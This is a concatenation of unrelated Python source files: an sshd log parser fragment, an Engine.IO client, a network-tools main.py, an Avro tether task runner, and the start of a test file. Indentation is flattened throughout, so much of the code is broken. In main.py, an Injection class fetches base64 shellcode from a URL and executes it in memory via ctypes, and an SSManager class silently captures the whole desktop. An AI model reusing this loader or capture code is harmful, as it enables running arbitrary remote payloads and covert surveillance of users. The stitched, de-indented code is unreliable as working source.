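    # Illustrative sshd log lines that get_checks/check_line expect (hypothetical):
    #   Sep 29 10:21:03 host sshd[123]: Accepted password for alice from 10.0.0.5 port 50022 ssh2
    #   Sep 29 10:21:09 host sshd[124]: Failed password for bob from 10.0.0.6 port 50100 ssh2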
def check_line(self, line):
if 'Accepted password' in line:
state = 'Success'
Dates, Timing, IP, user = self.get_checks(line)
return Dates, Timing, user, IP, state
elif 'Failed password' in line:
state = 'Failure'
Dates, Timing, IP, user = self.get_checks(line)
return Dates, Timing, user, IP, state
else:
return None
def check_line_queue(self, line_queue, tups):
while True:
line = line_queue.get()
tup = self.check_line(line)
if tup is not None:
self.lock.acquire()
tups.append(tup)
self.lock.release()
line_queue.task_done()
def show(self):
#dm = "PRAGMA table_info(%s)" % (self.tableName)
dm = "SELECT * FROM %s WHERE id = 10" % (self.tableName)
#dm = "SELECT DISTINCT(Dates) FROM %s" % self.tableName
#dm = "SELECT Timing, user, IP, state FROM %s WHERE Dates = '%s'" % (self.tableName, '2018-09-29')
#dm = "SELECT DISTINCT(user) FROM %s" % self.tableName
#dm = "SELECT * FROM %s WHERE Timing between datetime('2018-09-29', 'start of day', '1 second') and datetime('2018-09-29', 'start of day', '1 day', '-1 second') AND state='Failure'" % (self.tableName)
data = self.execute_set(dm)
for i in data:
print(i)
|
client.py | from base64 import b64encode
from json import JSONDecodeError
import logging
try:
import queue
except ImportError: # pragma: no cover
import Queue as queue
import signal
import ssl
import threading
import time
import six
from six.moves import urllib
try:
import requests
except ImportError: # pragma: no cover
requests = None
try:
import websocket
except ImportError: # pragma: no cover
websocket = None
from . import exceptions
from . import packet
from . import payload
default_logger = logging.getLogger('engineio.client')
connected_clients = []
if six.PY2: # pragma: no cover
ConnectionError = OSError
def signal_handler(sig, frame):
"""SIGINT handler.
Disconnect all active clients and then invoke the original signal handler.
"""
for client in connected_clients[:]:
if not client.is_asyncio_based():
client.disconnect()
if callable(original_signal_handler):
return original_signal_handler(sig, frame)
else: # pragma: no cover
# Handle case where no original SIGINT handler was present.
return signal.default_int_handler(sig, frame)
original_signal_handler = None
class Client(object):
"""An Engine.IO client.
This class implements a fully compliant Engine.IO web client with support
for websocket and long-polling transports.
:param logger: To enable logging set to ``True`` or pass a logger object to
use. To disable logging set to ``False``. The default is
``False``. Note that fatal errors are logged even when
``logger`` is ``False``.
:param json: An alternative json module to use for encoding and decoding
packets. Custom json modules must have ``dumps`` and ``loads``
functions that are compatible with the standard library
versions.
:param request_timeout: A timeout in seconds for requests. The default is
5 seconds.
:param http_session: an initialized ``requests.Session`` object to be used
when sending requests to the server. Use it if you
need to add special client options such as proxy
servers, SSL certificates, etc.
:param ssl_verify: ``True`` to verify SSL certificates, or ``False`` to
skip SSL certificate verification, allowing
connections to servers with self signed certificates.
The default is ``True``.
"""
event_names = ['connect', 'disconnect', 'message']
def __init__(self,
logger=False,
json=None,
request_timeout=5,
http_session=None,
ssl_verify=True):
global original_signal_handler
if original_signal_handler is None and \
threading.current_thread() == threading.main_thread():
original_signal_handler = signal.signal(signal.SIGINT,
signal_handler)
self.handlers = {}
self.base_url = None
self.transports = None
self.current_transport = None
self.sid = None
self.upgrades = None
self.ping_interval = None
self.ping_timeout = None
self.pong_received = True
self.http = http_session
self.ws = None
self.read_loop_task = None
self.write_loop_task = None
self.ping_loop_task = None
self.ping_loop_event = None
self.queue = None
self.state = 'disconnected'
self.ssl_verify = ssl_verify
if json is not None:
packet.Packet.json = json
if not isinstance(logger, bool):
self.logger = logger
else:
self.logger = default_logger
if not logging.root.handlers and \
self.logger.level == logging.NOTSET:
if logger:
self.logger.setLevel(logging.INFO)
else:
self.logger.setLevel(logging.ERROR)
self.logger.addHandler(logging.StreamHandler())
self.request_timeout = request_timeout
def is_asyncio_based(self):
return False
def on(self, event, handler=None):
"""Register an event handler.
:param event: The event name. Can be ``'connect'``, ``'message'`` or
``'disconnect'``.
:param handler: The function that should be invoked to handle the
event. When this parameter is not given, the method
acts as a decorator for the handler function.
Example usage::
# as a decorator:
@eio.on('connect')
def connect_handler():
print('Connection request')
# as a method:
def message_handler(msg):
print('Received message: ', msg)
eio.send('response')
eio.on('message', message_handler)
"""
if event not in self.event_names:
raise ValueError('Invalid event')
def set_handler(handler):
self.handlers[event] = handler
return handler
if handler is None:
return set_handler
set_handler(handler)
def connect(self, url, headers=None, transports=None,
engineio_path='engine.io'):
"""Connect to an Engine.IO server.
:param url: The URL of the Engine.IO server. It can include custom
query string parameters if required by the server.
:param headers: A dictionary with custom headers to send with the
connection request.
:param transports: The list of allowed transports. Valid transports
are ``'polling'`` and ``'websocket'``. If not
given, the polling transport is connected first,
then an upgrade to websocket is attempted.
:param engineio_path: The endpoint where the Engine.IO server is
installed. The default value is appropriate for
most cases.
Example usage::
eio = engineio.Client()
eio.connect('http://localhost:5000')
"""
if self.state != 'disconnected':
raise ValueError('Client is not in a disconnected state')
valid_transports = ['polling', 'websocket']
if transports is not None:
if isinstance(transports, six.string_types):
transports = [transports]
transports = [transport for transport in transports
if transport in valid_transports]
if not transports:
raise ValueError('No valid transports provided')
self.transports = transports or valid_transports
self.queue = self.create_queue()
return getattr(self, '_connect_' + self.transports[0])(
url, headers or {}, engineio_path)
def wait(self):
"""Wait until the connection with the server ends.
Client applications can use this function to block the main thread
during the life of the connection.
"""
if self.read_loop_task:
self.read_loop_task.join()
def send(self, data, binary=None):
"""Send a message to a client.
:param data: The data to send to the client. Data can be of type
``str``, ``bytes``, ``list`` or ``dict``. If a ``list``
or ``dict``, the data will be serialized as JSON.
:param binary: ``True`` to send packet as binary, ``False`` to send
as text. If not given, unicode (Python 2) and str
(Python 3) are sent as text, and str (Python 2) and
bytes (Python 3) are sent as binary.
"""
self._send_packet(packet.Packet(packet.MESSAGE, data=data,
binary=binary))
def disconnect(self, abort=False):
"""Disconnect from the server.
:param abort: If set to ``True``, do not wait for background tasks
associated with the connection to end.
"""
if self.state == 'connected':
self._send_packet(packet.Packet(packet.CLOSE))
self.queue.put(None)
self.state = 'disconnecting'
self._trigger_event('disconnect', run_async=False)
if self.current_transport == 'websocket':
self.ws.close()
if not abort:
self.read_loop_task.join()
self.state = 'disconnected'
try:
connected_clients.remove(self)
except ValueError: # pragma: no cover
pass
self._reset()
def transport(self):
"""Return the name of the transport currently in use.
The possible values returned by this function are ``'polling'`` and
``'websocket'``.
"""
return self.current_transport
def start_background_task(self, target, *args, **kwargs):
"""Start a background task.
This is a utility function that applications can use to start a
background task.
:param target: the target function to execute.
:param args: arguments to pass to the function.
:param kwargs: keyword arguments to pass to the function.
This function returns an object compatible with the `Thread` class in
the Python standard library. The `start()` method on this object is
already called by this function.
"""
th = threading.Thread(target=target, args=args, kwargs=kwargs)
th.start()
return th
def sleep(self, seconds=0):
"""Sleep for the requested amount of time."""
return time.sleep(seconds)
def create_queue(self, *args, **kwargs):
"""Create a queue object."""
q = queue.Queue(*args, **kwargs)
q.Empty = queue.Empty
return q
def create_event(self, *args, **kwargs):
"""Create an event object."""
return threading.Event(*args, **kwargs)
def _reset(self):
self.state = 'disconnected'
self.sid = None
def _connect_polling(self, url, headers, engineio_path):
"""Establish a long-polling connection to the Engine.IO server."""
if requests is None: # pragma: no cover
# not installed
self.logger.error('requests package is not installed -- cannot '
'send HTTP requests!')
return
self.base_url = self._get_engineio_url(url, engineio_path, 'polling')
self.logger.info('Attempting polling connection to ' + self.base_url)
r = self._send_request(
'GET', self.base_url + self._get_url_timestamp(), headers=headers,
timeout=self.request_timeout)
if r is None:
self._reset()
raise exceptions.ConnectionError(
'Connection refused by the server')
if r.status_code < 200 or r.status_code >= 300:
self._reset()
try:
arg = r.json()
except JSONDecodeError:
arg = None
raise exceptions.ConnectionError(
'Unexpected status code {} in server response'.format(
r.status_code), arg)
try:
p = payload.Payload(encoded_payload=r.content)
except ValueError:
six.raise_from(exceptions.ConnectionError(
'Unexpected response from server'), None)
open_packet = p.packets[0]
if open_packet.packet_type != packet.OPEN:
raise exceptions.ConnectionError(
'OPEN packet not returned by server')
self.logger.info(
'Polling connection accepted with ' + str(open_packet.data))
self.sid = open_packet.data['sid']
self.upgrades = open_packet.data['upgrades']
self.ping_interval = int(open_packet.data['pingInterval']) / 1000.0
self.ping_timeout = int(open_packet.data['pingTimeout']) / 1000.0
self.current_transport = 'polling'
self.base_url += '&sid=' + self.sid
self.state = 'connected'
connected_clients.append(self)
self._trigger_event('connect', run_async=False)
for pkt in p.packets[1:]:
self._receive_packet(pkt)
if 'websocket' in self.upgrades and 'websocket' in self.transports:
# attempt to upgrade to websocket
if self._connect_websocket(url, headers, engineio_path):
# upgrade to websocket succeeded, we're done here
return
# start background tasks associated with this client
self.ping_loop_task = self.start_background_task(self._ping_loop)
self.write_loop_task = self.start_background_task(self._write_loop)
self.read_loop_task = self.start_background_task(
self._read_loop_polling)
def _connect_websocket(self, url, headers, engineio_path):
"""Establish or upgrade to a WebSocket connection with the server."""
if websocket is None: # pragma: no cover
# not installed
self.logger.warning('websocket-client package not installed, only '
'polling transport is available')
return False
websocket_url = self._get_engineio_url(url, engineio_path, 'websocket')
if self.sid:
self.logger.info(
'Attempting WebSocket upgrade to ' + websocket_url)
upgrade = True
websocket_url += '&sid=' + self.sid
else:
upgrade = False
self.base_url = websocket_url
self.logger.info(
'Attempting WebSocket connection to ' + websocket_url)
# get cookies and other settings from the long-polling connection
# so that they are preserved when connecting to the WebSocket route
cookies = None
extra_options = {}
if self.http:
# cookies
cookies = '; '.join(["{}={}".format(cookie.name, cookie.value)
for cookie in self.http.cookies])
for header, value in headers.items():
if header.lower() == 'cookie':
if cookies:
cookies += '; '
cookies += value
del headers[header]
break
# auth
if 'Authorization' not in headers and self.http.auth is not None:
if not isinstance(self.http.auth, tuple): # pragma: no cover
raise ValueError('Only basic authentication is supported')
basic_auth = '{}:{}'.format(
self.http.auth[0], self.http.auth[1]).encode('utf-8')
basic_auth = b64encode(basic_auth).decode('utf-8')
headers['Authorization'] = 'Basic ' + basic_auth
# cert
# this can be given as ('certfile', 'keyfile') or just 'certfile'
if isinstance(self.http.cert, tuple):
extra_options['sslopt'] = {
'certfile': self.http.cert[0],
'keyfile': self.http.cert[1]}
elif self.http.cert:
extra_options['sslopt'] = {'certfile': self.http.cert}
# proxies
if self.http.proxies:
proxy_url = None
if websocket_url.startswith('ws://'):
proxy_url = self.http.proxies.get(
'ws', self.http.proxies.get('http'))
else: # wss://
proxy_url = self.http.proxies.get(
'wss', self.http.proxies.get('https'))
if proxy_url:
parsed_url = urllib.parse.urlparse(
proxy_url if '://' in proxy_url
else 'scheme://' + proxy_url)
extra_options['http_proxy_host'] = parsed_url.hostname
extra_options['http_proxy_port'] = parsed_url.port
extra_options['http_proxy_auth'] = (
(parsed_url.username, parsed_url.password)
if parsed_url.username or parsed_url.password
else None)
# verify
if not self.http.verify:
self.ssl_verify = False
if not self.ssl_verify:
extra_options['sslopt'] = {"cert_reqs": ssl.CERT_NONE}
try:
ws = websocket.create_connection(
websocket_url + self._get_url_timestamp(), header=headers,
cookie=cookies, enable_multithread=True, **extra_options)
except (ConnectionError, IOError, websocket.WebSocketException):
if upgrade:
self.logger.warning(
'WebSocket upgrade failed: connection error')
return False
else:
raise exceptions.ConnectionError('Connection error')
if upgrade:
p = packet.Packet(packet.PING,
data=six.text_type('probe')).encode()
try:
ws.send(p)
except Exception as e: # pragma: no cover
self.logger.warning(
'WebSocket upgrade failed: unexpected send exception: %s',
str(e))
return False
try:
p = ws.recv()
except Exception as e: # pragma: no cover
self.logger.warning(
'WebSocket upgrade failed: unexpected recv exception: %s',
str(e))
return False
pkt = packet.Packet(encoded_packet=p)
if pkt.packet_type != packet.PONG or pkt.data != 'probe':
self.logger.warning(
'WebSocket upgrade failed: no PONG packet')
return False
p = packet.Packet(packet.UPGRADE).encode()
try:
ws.send(p)
except Exception as e: # pragma: no cover
self.logger.warning(
'WebSocket upgrade failed: unexpected send exception: %s',
str(e))
return False
self.current_transport = 'websocket'
self.logger.info('WebSocket upgrade was successful')
else:
try:
p = ws.recv()
except Exception as e: # pragma: no cover
raise exceptions.ConnectionError(
'Unexpected recv exception: ' + str(e))
open_packet = packet.Packet(encoded_packet=p)
if open_packet.packet_type != packet.OPEN:
raise exceptions.ConnectionError('no OPEN packet')
self.logger.info(
'WebSocket connection accepted with ' + str(open_packet.data))
self.sid = open_packet.data['sid']
self.upgrades = open_packet.data['upgrades']
self.ping_interval = int(open_packet.data['pingInterval']) / 1000.0
self.ping_timeout = int(open_packet.data['pingTimeout']) / 1000.0
self.current_transport = 'websocket'
self.state = 'connected'
connected_clients.append(self)
self._trigger_event('connect', run_async=False)
self.ws = ws
# start background tasks associated with this client
self.ping_loop_task = self.start_background_task(self._ping_loop)
self.write_loop_task = self.start_background_task(self._write_loop)
self.read_loop_task = self.start_background_task(
self._read_loop_websocket)
return True
def _receive_packet(self, pkt):
"""Handle incoming packets from the server."""
packet_name = packet.packet_names[pkt.packet_type] \
if pkt.packet_type < len(packet.packet_names) else 'UNKNOWN'
self.logger.info(
'Received packet %s data %s', packet_name,
pkt.data if not isinstance(pkt.data, bytes) else '<binary>')
if pkt.packet_type == packet.MESSAGE:
self._trigger_event('message', pkt.data, run_async=True)
elif pkt.packet_type == packet.PONG:
self.pong_received = True
elif pkt.packet_type == packet.CLOSE:
self.disconnect(abort=True)
elif pkt.packet_type == packet.NOOP:
pass
else:
self.logger.error('Received unexpected packet of type %s',
pkt.packet_type)
def _send_packet(self, pkt):
"""Queue a packet to be sent to the server."""
if self.state != 'connected':
return
self.queue.put(pkt)
self.logger.info(
'Sending packet %s data %s',
packet.packet_names[pkt.packet_type],
pkt.data if not isinstance(pkt.data, bytes) else '<binary>')
def _send_request(
self, method, url, headers=None, body=None,
timeout=None): # pragma: no cover
if self.http is None:
self.http = requests.Session()
try:
return self.http.request(method, url, headers=headers, data=body,
timeout=timeout, verify=self.ssl_verify)
except requests.exceptions.RequestException as exc:
self.logger.info('HTTP %s request to %s failed with error %s.',
method, url, exc)
def _trigger_event(self, event, *args, **kwargs):
"""Invoke an event handler."""
run_async = kwargs.pop('run_async', False)
if event in self.handlers:
if run_async:
return self.start_background_task(self.handlers[event], *args)
else:
try:
return self.handlers[event](*args)
                except Exception:
self.logger.exception(event + ' handler error')
def _get_engineio_url(self, url, engineio_path, transport):
"""Generate the Engine.IO connection URL."""
engineio_path = engineio_path.strip('/')
parsed_url = urllib.parse.urlparse(url)
if transport == 'polling':
scheme = 'http'
elif transport == 'websocket':
scheme = 'ws'
else: # pragma: no cover
raise ValueError('invalid transport')
if parsed_url.scheme in ['https', 'wss']:
scheme += 's'
return ('{scheme}://{netloc}/{path}/?{query}'
'{sep}transport={transport}&EIO=3').format(
scheme=scheme, netloc=parsed_url.netloc,
path=engineio_path, query=parsed_url.query,
sep='&' if parsed_url.query else '',
transport=transport)
def _get_url_timestamp(self):
"""Generate the Engine.IO query string timestamp."""
return '&t=' + str(time.time())
def _ping_loop(self):
"""This background task sends a PING to the server at the requested
interval.
"""
self.pong_received = True
if self.ping_loop_event is None:
self.ping_loop_event = self.create_event()
else:
self.ping_loop_event.clear()
while self.state == 'connected':
if not self.pong_received:
self.logger.info(
'PONG response has not been received, aborting')
if self.ws:
self.ws.close(timeout=0)
self.queue.put(None)
break
self.pong_received = False
self._send_packet(packet.Packet(packet.PING))
self.ping_loop_event.wait(timeout=self.ping_interval)
self.logger.info('Exiting ping task')
def _read_loop_polling(self):
"""Read packets by polling the Engine.IO server."""
while self.state == 'connected':
self.logger.info(
'Sending polling GET request to ' + self.base_url)
r = self._send_request(
'GET', self.base_url + self._get_url_timestamp(),
timeout=max(self.ping_interval, self.ping_timeout) + 5)
if r is None:
self.logger.warning(
'Connection refused by the server, aborting')
self.queue.put(None)
break
if r.status_code < 200 or r.status_code >= 300:
self.logger.warning('Unexpected status code %s in server '
'response, aborting', r.status_code)
self.queue.put(None)
break
try:
p = payload.Payload(encoded_payload=r.content)
except ValueError:
self.logger.warning(
'Unexpected packet from server, aborting')
self.queue.put(None)
break
for pkt in p.packets:
self._receive_packet(pkt)
self.logger.info('Waiting for write loop task to end')
self.write_loop_task.join()
self.logger.info('Waiting for ping loop task to end')
if self.ping_loop_event: # pragma: no cover
self.ping_loop_event.set()
self.ping_loop_task.join()
if self.state == 'connected':
self._trigger_event('disconnect', run_async=False)
try:
connected_clients.remove(self)
except ValueError: # pragma: no cover
pass
self._reset()
self.logger.info('Exiting read loop task')
def _read_loop_websocket(self):
"""Read packets from the Engine.IO WebSocket connection."""
while self.state == 'connected':
p = None
try:
p = self.ws.recv()
except websocket.WebSocketConnectionClosedException:
self.logger.warning(
'WebSocket connection was closed, aborting')
self.queue.put(None)
break
except Exception as e:
self.logger.info(
'Unexpected error receiving packet: "%s", aborting',
str(e))
self.queue.put(None)
break
if isinstance(p, six.text_type): # pragma: no cover
p = p.encode('utf-8')
try:
pkt = packet.Packet(encoded_packet=p)
except Exception as e: # pragma: no cover
self.logger.info(
'Unexpected error decoding packet: "%s", aborting', str(e))
self.queue.put(None)
break
self._receive_packet(pkt)
self.logger.info('Waiting for write loop task to end')
self.write_loop_task.join()
self.logger.info('Waiting for ping loop task to end')
if self.ping_loop_event: # pragma: no cover
self.ping_loop_event.set()
self.ping_loop_task.join()
if self.state == 'connected':
self._trigger_event('disconnect', run_async=False)
try:
connected_clients.remove(self)
except ValueError: # pragma: no cover
pass
self._reset()
self.logger.info('Exiting read loop task')
def _write_loop(self):
"""This background task sends packages to the server as they are
pushed to the send queue.
"""
while self.state == 'connected':
# to simplify the timeout handling, use the maximum of the
# ping interval and ping timeout as timeout, with an extra 5
# seconds grace period
timeout = max(self.ping_interval, self.ping_timeout) + 5
packets = None
try:
packets = [self.queue.get(timeout=timeout)]
except self.queue.Empty:
self.logger.error('packet queue is empty, aborting')
break
if packets == [None]:
self.queue.task_done()
packets = []
else:
while True:
try:
packets.append(self.queue.get(block=False))
except self.queue.Empty:
break
if packets[-1] is None:
packets = packets[:-1]
self.queue.task_done()
break
if not packets:
# empty packet list returned -> connection closed
break
if self.current_transport == 'polling':
p = payload.Payload(packets=packets)
r = self._send_request(
'POST', self.base_url, body=p.encode(),
headers={'Content-Type': 'application/octet-stream'},
timeout=self.request_timeout)
for pkt in packets:
self.queue.task_done()
if r is None:
self.logger.warning(
'Connection refused by the server, aborting')
break
if r.status_code < 200 or r.status_code >= 300:
self.logger.warning('Unexpected status code %s in server '
'response, aborting', r.status_code)
self._reset()
break
else:
# websocket
try:
for pkt in packets:
encoded_packet = pkt.encode(always_bytes=False)
if pkt.binary:
self.ws.send_binary(encoded_packet)
else:
self.ws.send(encoded_packet)
self.queue.task_done()
except (websocket.WebSocketConnectionClosedException,
BrokenPipeError, OSError):
self.logger.warning(
'WebSocket connection was closed, aborting')
break
self.logger.info('Exiting write loop task')
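# Hedged usage sketch (standard Engine.IO client pattern; the URL is a placeholder):
def _example_client():
    eio = Client(logger=True)

    @eio.on('message')
    def on_message(data):
        print('received: ' + str(data))
        eio.send('ack')

    eio.connect('http://localhost:5000')
    eio.wait()  # block until the connection ends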
|
main.py | # database => http://geolite.maxmind.com/download/geoip/database/GeoLiteCity.dat.gz
# pip install pygeoip => this repo deprecated yet still works
# pip install dpkt => packet creation / parsing, with definitions for the basic TCP/IP protocols
# pip install scapy => packet creation / parsing
# pip install IPy => IPTEST
import pygeoip as pg
import dpkt
import socket
from scapy.all import *
from IPy import IP as IPTEST
GEO_IP_DATABASE_PATH = '/opt/geoip/Geo.dat'  # local path to the GeoLiteCity .dat file
MAX_HOP_DIFFERENCE = 5 # threshold for ttl difference
def getIpInfo(targetIp):
    return pg.GeoIP(GEO_IP_DATABASE_PATH).record_by_name(targetIp)
def analysePcap(pcapFilePath):
    pcapFileHandler = open(pcapFilePath, 'rb')  # pcap files must be read in binary mode
pcapInfo = dpkt.pcap.Reader(pcapFileHandler)
for (timestamp, packet) in pcapInfo:
try:
eth = dpkt.ethernet.Ethernet(packet) # physical and data link layers
ip = eth.data
source = socket.inet_ntoa(ip.src)
destination = socket.inet_ntoa(ip.dst)
ipInfoSrc = getIpInfo(source)
ipInfoDst = getIpInfo(destination)
print 'From: ' + source + ' to: ' + destination + '\n'
print ipInfoSrc['city'] + ', ' + ipInfoSrc['country_code3'] + ' --> ' + ipInfoDst['city'] + ', ' + ipInfoDst['country_code3']
print '---------------------------------------\n'
except:
pass
ttlValues = {}  # module-level cache so probe results persist across calls

def checkTTL(ipSrc, ttl):
    if IPTEST(ipSrc).iptype == 'PRIVATE':
        return
    if ipSrc not in ttlValues:
        packet = sr1(IP(dst=ipSrc) / ICMP(), retry=0, timeout=1, verbose=0)
        if packet is None:  # no ICMP reply, nothing to compare against
            return
        ttlValues[ipSrc] = packet.ttl
    if abs(int(ttl) - int(ttlValues[ipSrc])) > MAX_HOP_DIFFERENCE:
        print 'Detected possible spoofed packet from: ' + ipSrc
        print 'TTL: ' + ttl + ' Actual TTL: ' + str(ttlValues[ipSrc])
def watchTTL(packet):
try:
if packet.haslayer(IP):
ipSrc = packet.getlayer(IP).src
ttl = str(packet.ttl)
checkTTL(ipSrc, ttl)
# print 'Packet received from: ' + ipSrc + ' with TTL: ' + ttl
except:
pass
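def watchForSpoofing():
    # Hedged sketch (helper not in the original file): feed every sniffed
    # packet to watchTTL; requires root privileges. Same call that is
    # commented out in main() below.
    sniff(prn=watchTTL, store=0)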
def simpleTCPClient(host="www.google.com", port=80):
import socket
targetHost = host
targetPort = port
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect((targetHost, targetPort))
client.send('GET / HTTP/1.1\nHost: google.com\n\n')
response = client.recv(4096)
print response
def simpleUDPClient():
import socket
targetHost = "127.0.0.1"
targetPort = 80
client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
client.sendto("AABBTTFFWW", (targetHost, targetPort))
data, addr = client.recvfrom(4096)
print data
print addr
def handleTCPClient(clientSocket):
request = clientSocket.recv(1024)
    print 'Received: %s' % request
    clientSocket.send('ACK')
clientSocket.close()
def TCPServer():
import socket
import threading
bindIP = "0.0.0.0"
bindPort = 9999
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((bindIP, bindPort))
server.listen(5)
while True:
client, addr = server.accept()
print 'Accepted connection from: %s:%d' %(addr[0], addr[1])
clientHandler = threading.Thread(target=handleTCPClient, args=(client,))
clientHandler.start()
class SSManager(object):
def take_ss(self, pathToSS):
import win32gui
import win32ui
import win32con
import win32api
hdesktop = win32gui.GetDesktopWindow()
width = win32api.GetSystemMetrics(win32con.SM_CXVIRTUALSCREEN)
height = win32api.GetSystemMetrics(win32con.SM_CYVIRTUALSCREEN)
left = win32api.GetSystemMetrics(win32con.SM_XVIRTUALSCREEN)
top = win32api.GetSystemMetrics(win32con.SM_YVIRTUALSCREEN)
desktop_dc = win32gui.GetWindowDC(hdesktop)
img_dc = win32ui.CreateDCFromHandle(desktop_dc)
mem_dc = img_dc.CreateCompatibleDC()
screenshot = win32ui.CreateBitmap()
screenshot.CreateCompatibleBitmap(img_dc, width, height)
mem_dc.SelectObject(screenshot)
mem_dc.BitBlt((0, 0), (width, height), img_dc, (left, top), win32con.SRCCOPY)
screenshot.SaveBitmapFile(mem_dc, pathToSS)
mem_dc.DeleteDC()
win32gui.DeleteObject(screenshot.GetHandle())
class Injection(object):
def inject(self, shellcode_url):
import urllib2
import ctypes
import base64
response = urllib2.urlopen(shellcode_url)
shellcode = base64.b64decode(response.read())
shellcode_buffer = ctypes.create_string_buffer(shellcode, len(shellcode))
shellcode_func = ctypes.cast(shellcode_buffer, ctypes.CFUNCTYPE(ctypes.c_void_p))
shellcode_func()
def main():
# {'city': u'Istanbul', 'region_code': u'34', 'area_code': 0, 'time_zone': 'Asia/Istanbul', 'dma_code': 0, 'metro_code': None, 'country_code3': 'TUR', 'latitude': 41.01859999999999, 'postal_code': None, 'longitude': 28.964699999999993, 'country_code': 'TR', 'country_name': 'Turkey', 'continent': 'EU'}
# print(getIpInfo('212.2.212.131'))
# sniff(prn=watchTTL, store=0)
# simpleTCPClient()
# simpleUDPClient()
    # TCPServer()
    pass  # a comments-only body is a SyntaxError; uncomment one demo above to run it
if __name__ == '__main__':
main()
|
tether_task_runner.py | """
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* https://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
"""
__all__=["TaskRunner"]
if __name__ == "__main__":
# Relative imports don't work when being run directly
from avro import tether
from avro.tether import TetherTask, find_port, inputProtocol
else:
from . import TetherTask, find_port, inputProtocol
from avro import ipc
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
import logging
import weakref
import threading
import sys
import traceback
class TaskRunnerResponder(ipc.Responder):
"""
    The responder for the tethered process
"""
def __init__(self,runner):
"""
Param
----------------------------------------------------------
runner - Instance of TaskRunner
"""
ipc.Responder.__init__(self, inputProtocol)
self.log=logging.getLogger("TaskRunnerResponder")
        # Use weak references to avoid a circular reference:
        # self.runner owns this instance of TaskRunnerResponder
if isinstance(runner,weakref.ProxyType):
self.runner=runner
else:
self.runner=weakref.proxy(runner)
self.task=weakref.proxy(runner.task)
    def invoke(self, message, request):
        try:
            if message.name=='configure':
                self.log.info("TetherTaskRunner: Received configure")
                self.task.configure(request["taskType"],request["inSchema"],request["outSchema"])
            elif message.name=='partitions':
                self.log.info("TetherTaskRunner: Received partitions")
                try:
                    self.task.set_partitions(request["partitions"])
                except Exception as e:
                    self.log.error("Exception occurred while processing the partitions message: Message:\n"+traceback.format_exc())
                    raise
            elif message.name=='input':
                self.log.info("TetherTaskRunner: Received input")
                self.task.input(request["data"],request["count"])
            elif message.name=='abort':
                self.log.info("TetherTaskRunner: Received abort")
                self.runner.close()
            elif message.name=='complete':
                self.log.info("TetherTaskRunner: Received complete")
                self.task.complete()
                self.task.close()
                self.runner.close()
            else:
                self.log.warning("TetherTaskRunner: received unknown message {0}".format(message.name))
        except Exception as e:
            self.log.error("Error occurred while processing message: {0}".format(message.name))
            emsg=traceback.format_exc()
            self.task.fail(emsg)
        return None
def HTTPHandlerGen(runner):
"""
    This is a class factory for the HTTPHandler. We need
    a factory because the handler needs a reference to the runner
Parameters
-----------------------------------------------------------------
runner - instance of the task runner
"""
if not(isinstance(runner,weakref.ProxyType)):
runnerref=weakref.proxy(runner)
else:
runnerref=runner
class TaskRunnerHTTPHandler(BaseHTTPRequestHandler):
"""Create a handler for the parent.
"""
runner=runnerref
def __init__(self,*args,**param):
"""
"""
BaseHTTPRequestHandler.__init__(self,*args,**param)
def do_POST(self):
self.responder =TaskRunnerResponder(self.runner)
call_request_reader = ipc.FramedReader(self.rfile)
call_request = call_request_reader.read_framed_message()
resp_body = self.responder.respond(call_request)
self.send_response(200)
self.send_header('Content-Type', 'avro/binary')
self.end_headers()
resp_writer = ipc.FramedWriter(self.wfile)
resp_writer.write_framed_message(resp_body)
return TaskRunnerHTTPHandler
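def _make_server(runner, port):
    """
    Hedged sketch (illustrative only, not in the original module): each
    HTTPHandlerGen call binds a fresh handler class to one runner instance,
    mirroring what TaskRunner.start does below.
    """
    return HTTPServer(("localhost", port), HTTPHandlerGen(runner))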
class TaskRunner(object):
"""This class ties together the server handling the requests from
the parent process and the instance of TetherTask which actually
implements the logic for the mapper and reducer phases
"""
def __init__(self,task):
"""
Construct the runner
Parameters
---------------------------------------------------------------
task - An instance of tether task
"""
self.log=logging.getLogger("TaskRunner:")
if not(isinstance(task,TetherTask)):
raise ValueError("task must be an instance of tether task")
self.task=task
self.server=None
self.sthread=None
def start(self,outputport=None,join=True):
"""
Start the server
Parameters
-------------------------------------------------------------------
outputport - (optional) The port on which the parent process is listening
for requests from the task.
- This will typically be supplied by an environment variable
we allow it to be supplied as an argument mainly for debugging
    join - (optional) If set to False then we don't issue a join to block
           until the thread executing the server terminates.
           This is mainly for debugging. By setting it to False,
           we can resume execution in this thread so that we can do additional
           testing
"""
port=find_port()
address=("localhost",port)
def thread_run(task_runner=None):
task_runner.server = HTTPServer(address, HTTPHandlerGen(task_runner))
task_runner.server.allow_reuse_address = True
task_runner.server.serve_forever()
# create a separate thread for the http server
sthread=threading.Thread(target=thread_run,kwargs={"task_runner":self})
sthread.start()
self.sthread=sthread
        # This needs to run in a separate thread because serve_forever() blocks
self.task.open(port,clientPort=outputport)
# wait for the other thread to finish
if (join):
self.task.ready_for_shutdown.wait()
self.server.shutdown()
# should we do some kind of check to make sure it exits
self.log.info("Shutdown the logger")
# shutdown the logging
logging.shutdown()
def close(self):
"""
Handler for the close message
"""
self.task.close()
if __name__ == '__main__':
# TODO::Make the logging level a parameter we can set
# logging.basicConfig(level=logging.INFO,filename='/tmp/log',filemode='w')
logging.basicConfig(level=logging.INFO)
if (len(sys.argv)<=1):
print "Error: tether_task_runner.__main__: Usage: tether_task_runner task_package.task_module.TaskClass"
raise ValueError("Usage: tether_task_runner task_package.task_module.TaskClass")
fullcls=sys.argv[1]
mod,cname=fullcls.rsplit(".",1)
logging.info("tether_task_runner.__main__: Task: {0}".format(fullcls))
modobj=__import__(mod,fromlist=cname)
taskcls=getattr(modobj,cname)
task=taskcls()
runner=TaskRunner(task=task)
runner.start()
|
functional_tests.py | #!/usr/bin/env python
import os
import sys
import shutil
import tempfile
import re
from ConfigParser import SafeConfigParser
# Assume we are run from the galaxy root directory, add lib to the python path
